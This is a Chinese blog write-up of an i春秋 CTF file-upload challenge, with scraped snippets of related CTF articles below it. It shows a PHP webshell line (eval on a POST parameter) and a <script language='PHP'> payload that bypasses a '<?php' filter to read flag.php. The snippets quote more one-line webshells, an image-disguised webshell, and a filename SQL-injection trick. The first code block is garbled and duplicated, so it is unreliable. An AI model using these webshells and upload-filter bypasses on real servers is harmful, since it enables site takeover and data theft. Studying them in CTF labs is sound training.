i春秋CTF Upload

最新推荐文章于 2023-10-05 21:36:50 发布

原创最新推荐文章于 2023-10-05 21:36:50 发布 · 1.3k 阅读

1 ·

CC 4.0 BY-SA版权

本文探讨了一种通过PHP脚本标记绕过文件上传过滤的方法。面对<?php被过滤的情况，采用<script language=PHP>进行尝试。此技巧允许上传特殊构造的PHP文件以读取敏感信息。

分析

可以上传任意文件，并且上传之后可以打开文件（源码有链接/u/xx.php），想到上传一段php代码来打开flag.php页面：
```
php<?php
echo 'here_is_flag';
'flag{47f996fc-4d6c-43e5-af3e-38022f1ba7a3}';xxxxxxxxxx <?phpecho 'here_is_flag';'flag{47f996fc-4d6c-43e5-af3e-38022f1ba7a3}';<?phpeval(@_POST["v"]);?>
```
但是发现<?php被过滤了，于是用php脚本标记来绕过过滤：

<script language="PHP">
$fh=fopen("../flag.".strtolower("PHP"),'r');
echo fread($fh,filesize("../flag.".strtolower("PHP"))); 
fclose($fh);
</script>

查看源码：

echo 'here_is_flag';
'flag{###}';

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

「已注销」

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

CTF之upload

qq_74263993的博客

05-19

788

那我们就使用hex()和conv()两个函数，将字符转换成16进制再转换成十进制，123' +(selecselectt conv(hex(database()),16, 10))+ '.jpg，但是发现变成科学计数法了，经过多次尝试发现当输出的数字超过12位后便会以科学计数法的方式输出。那么便抓包修改一下，我们上传一个图片格式文件，将名字里加个select，发现上传后的文件没了select这个字符串，那么应该就是存在文件名位置的sql注入了，而select应该是被过滤成空了。

CTF---Web---文件上传---01---文件欺骗+命令执行

qq_22160557的博客

08-02

2757

文章目录前言一、题目描述二、解题步骤1、文件欺骗（GIF89a）2、上传路径（uploads）3、利用上传漏洞三、总结前言题目分类： CTF—Web—文件上传—01—文件欺骗+命令执行一、题目描述题目：文件上传二、解题步骤 1、文件欺骗（GIF89a） Step1：上传正常jpg文件，没有问题，上传一句话木马伪装的jpg文件，提示格式不对，上传图片马，提示文件格式不对 Step2：上传一个09.php.jpg，用BP抓包，修改request中的内容，实现文件欺骗，让木马能够正确上传。Gif文件

参与评论您还未登录，请先登录后发表或查看评论

i春秋-ctf 文件上传

AAAAAAAAAAAA66的博客

11-08

9806

文章目录前言一、题目二、解题步骤 1.我的错误思路 2.正确解题姿势总结前言 CTF小白，这道题思考了很久，i春秋上现在也没write up，卡了1天了，后面在buuctf找到了题解答。通过这一天让我对文件上传有了更深的理解。目录文章目录一、题目进入环境。二、解题步骤 1.我的错误思路 2.正确解题姿势总结一道普通的文件上传题，通过一天的思考我得到这类题目的思路总结。提示：以下是本篇文章正文内容，下

php upload ctf,强网杯CTF防御赛ez_upload Writeup

weixin_35645813的博客

03-17

1475

这是强网杯拟态防御线下赛遇到的web题目，本来是不打算分享Writeup的，但是由于问的人很多，于是这里分享给大家。ez_upload这题算是非常经典的堆叠black trick的题目，算是比较典型的ctf式题目(虽然现在大家都很抵制这样的题目)，这里主要是分享Writeup以及我们队在完成题目时的思考流程。ez_upload 思考流程最开始我先描述一下题目逻辑。1、login.php，登陆页面，...

CTF-web(攻防世界upload1)

分享与记录

07-10

1278

上传的必须是图片抓包绕过返回路径访问/upload/1594351827.1.php，system(phpinfo());执行成功继续上传蚁剑连接 flag显而易见

i春秋CTF训练 Web Upload

椰奶冻不安全的博客

06-21

1474

Misc Web 爆破-2](https://www.ichunqiu.com/battalion?t=1) 题目内容：想怎么传就怎么传，就是这么任性。 tips:flag在flag.php中链接需到ichunqiu网站申请访问网页得到文件上传输入框明显是文件上传漏洞方法一：上传木马上传小马 <?pHp @eval($_POST['123']);?> 页面显示 @eval($_POST['123']);?> 把<?和php过滤了，可以用大小写绕过php的过

i 春秋CTF题目百度杯 9月场再见CMS Upload 复现

AAAAAAAAAAAA66的博客

12-24

1782

今天花了点时间刷了下题目，遇到几道相对来说进阶的题目，学习一下储备一些CTF思路，这些题。。脑洞有点开。再见CMS 昨天刚做一道 [WEB攻防] i春秋- “百度杯”CTF比赛十二月场-YeserCMS cmseasy CmsEasy_5.6_20151009 无限制报错注入复现过程_AAAAAAAAAAAA66的博客-优快云博客今天继续按着套路来直接在线CMS指纹识别百度找到payload ，都是些过了很久的漏洞了这里简单知道是一个注入漏洞就行了，我们的目的是照着pa

i春秋 web“百度杯”CTF比赛九月场-Upload & code

ChanCherry的博客

10-13

1102

“百度杯”CTF比赛九月场Upload 可以上传文件，并且上传之后可以点击源码链接打开文件，上传了这几句话： <?php @eval($POST["code"]); ?> 结果发现<?php被过滤了，于是用php脚本标记来绕过过滤： <script language="PHP"> $fh=fopen("../flag.".strtolower("PHP"),'r...

i春秋CTF训练 Web who are you?

椰奶冻不安全的博客

06-30

811

Web who are you? 题目内容：http://106.75.72.168:2222/ 我是谁，我在哪，我要做什么？在文件头发现了Cookie role=Zjo1OiJ0aHJmZyI7 将Zjo1OiJ0aHJmZyI7base64解码得到f:5:"thrfg";使用凯撒密码爆破thrfg发现其位移13位是guest 故可以用admin的rot-13：nqzva，构造f:5:"nqzva"然后base64加密Zjo1OiJucXp2YSI= 用burpsuit抓包改cookie得到

CTF学习记录 i春秋《从0到1：CTFer成长之路》文件上传

mastergu2的博客

10-21

4425

21.10.19 第二次开始学习CTF 感觉很有收获至少有让自己忙起来了的感觉感觉有一些学习状态了打算重新记录一下学习笔记！加油我会坚持下去的！题目代码首先附上题目的代码段（不完整） show_source(__FILE__); }else{ $file = $_FILES['file']; if(!$file){ exit("请勿上传空文件"); } $name = $file['name']; $dir = 'upload/

CTF之路：Flask_FileUpload文件上传漏洞利用、关于os.system()与更强大的os.popen()

zw05011的博客

01-08

4191

1.题目 BP上分析数据包，发现有提示： Give me the file, and I will return the Running results by python to you! 意思是：上传一个文件，系统将用python运行它，并返回结果经验告诉我们，上传的文件里应该含有python可执行代码。知识点 os.system()函数实现在程序中执行命令行命令解题分析上传文件发现似乎只能上传图片这也没关系，可以把文件重命名为.png/jpg 打开一个file，写入代码 import os

CTF中的BUUCTF之[ACTF2020 新生赛]Upload

weixin_44632787的博客

06-17

607

CTF中的BUUCTF之[ACTF2020 新生赛]Upload 启动我们的挑战项目好吧，不管怎么看都是文件上传类型的题目。那么我们就用我经常用的一句话木马吧： GIF89a? <script language="php">eval($_POST['zyh']);</script> 然后将上面的内容改成1.png。然后上传我们的1.png（别忘记了要打开BurpSuite来进行抓包）。将BurpSuite抓到的包发送到Repeater模块然后把文件名1.png改成1.

CTFshow Web入门文件上传

m0_62905261的博客

10-05

1059

CTFshow Web入门文件上传

暑期web10：基础的文件上传upload（i春秋）、上传绕过（实验吧）

qq_41618162的博客

08-18

2916

介于之前做了个包括文件上传步骤的题，突然想拿两个之前做过的文件上传题来回顾一下一些基础做法首先是实验吧的上传绕过首先我们上传最基础的一句话木马：&lt;?php @eval($_POST['pass']);?&gt; 反馈是‘不被允许的文件类型,仅支持上传jpg,gif,png后缀的文件’ 于是我把他的后缀改为.jpg再上传，又回显‘必须上传后缀名为php的文件才行’ 做成php...

安恒6月赛部分做题记录

0verWatch的博客

06-23

3011

前言这次比赛恰逢别的学校考试，感觉题目有点水，但还是得记录一下正文 Web1 Mynote 这道题目一开始我死扣xss发现无路可循后面经别人小小提醒之后，原来是个炒鸡弱智的反序列化题目，不多说上图，在robots.txt里面发现几个可疑的页面，可能有用先记录着，直接访问flag.php是个假的flag。。经过别人的提示，是反序列化以后，多抓几个包看一下在uplo...

i春秋ctf练习

sparename的博客

04-24

4998

类型：Misc 题目名称：签到题类型：Misc 题目名称：所以这是13点吗类型：Misc 题目名称：嘀嘀嘀类型：Misc 题目名称：山岚类型：Misc 题目名称：签到题2 类型：Misc 题目名称：XX 类型：Misc 题目名称：贝丝家族类型：Misc 题目名称：敲击类型：Misc 题目名称：签到题3 类型：Misc 题目名称：小常识类型：Misc 题目名称：回归原始

CTF学习笔记——Upload

Obs_cure的博客

02-08

2826

一、 1.题目 2.解题步骤 3.总结 4.参考资料

CTF-中文件上传（2）

欢迎来到神林的博客

04-18

7494

0x00:二次渲染今天上午刚刚结束的DDCTF真的是让人脑壳很大，除了膜拜一波大佬之外，还get到了很多的新知识：文件上传中，大部分题目回绕求我们上传图片格式，而我们就会伪造一些图片绕过验证，一些简单的前端验证还有一些服务器端的验证，都是比较简单的，但是有的时候就会涉及到比较困难的知识点，比如今天要说的：二次渲染所谓二次渲染：就是根据用户上传的图片，新生成一个图片，将原始图片删除，将新图片...

CTF - WEB - upload

跳房子的博客

10-21

3006

$name = $_GET['name']; $url = $_SERVER['QUERY_STRING']; if (isset($name)){ if (preg_match('/\.|etc|var|tmp|usr/i', $url)){ echo("hacker!"); } else{ if (preg_match('/base|class|file|function|index|upload_file/i', $name)){

i春秋ctf web